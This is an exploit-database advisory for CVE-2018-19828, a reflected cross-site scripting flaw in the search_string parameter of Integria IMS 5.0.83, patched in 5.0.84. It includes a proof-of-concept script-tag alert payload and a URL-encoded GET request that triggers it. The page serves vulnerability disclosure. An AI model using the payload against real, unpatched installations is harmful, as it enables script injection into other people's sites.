Integria IMS 5.0.83 Cross Site Scripting

2018.12.20

Credit: Javier Olmedo

Risk: Low

Local: No

Remote: Yes

CVE: CVE-2018-19828

CWE: CWE-79

CVSS Base Score: 4.3/10

Impact Subscore: 2.9/10

Exploitability Subscore: 8.6/10

Exploit range: Remote

Attack complexity: Medium

Authentication: No required

Confidentiality impact: None

Integrity impact: Partial

Availability impact: None

# Exploit Title: Integria IMS 5.0.83 - Cross-Site Scripting
# Exploit Author: Javier Olmedo
# Website: https://hackpuntes.com
# Date: 2018-12-18
# Google Dork: N/A
# Vendor: Artica ST
# Software Link: https://github.com/articaST/integriaims
# Affected Version: 5.0.83 and possibly before
# Patched Version: 5.0.84
# Category: Web Application
# Platform: Windows
# Tested on: Win10x64 & Kali Linux
# CVE: 2018-19828
# References:
# https://hackpuntes.com/cve-2018-19828-integria-ims-5-0-83-cross-site-scripting-reflejado/
# https://github.com/articaST/integriaims/commit/25d810b1c8e138e4b47d5cd14b2cd9b564f19b1e
# 1. Technical Description:
# search_string parameter is vulnerable to Reflected Cross-Site Scripting (XSS) attacks
# through a GET request in index.php resource.
# 2. Proof Of Concept (PoC):
# On the main page, go to the search form and add the following payload
# '><script>alert('PoC CVE-2018-19828')</script>
# 3. Payload
# http://[PATH]/index.php?search_string=%27%3E%3Cscript%3Ealert(%27PoC%20CVE-2018-19828%27)%3C%2Fscript%3E

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Integria IMS 5.0.83 Cross Site Scripting

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.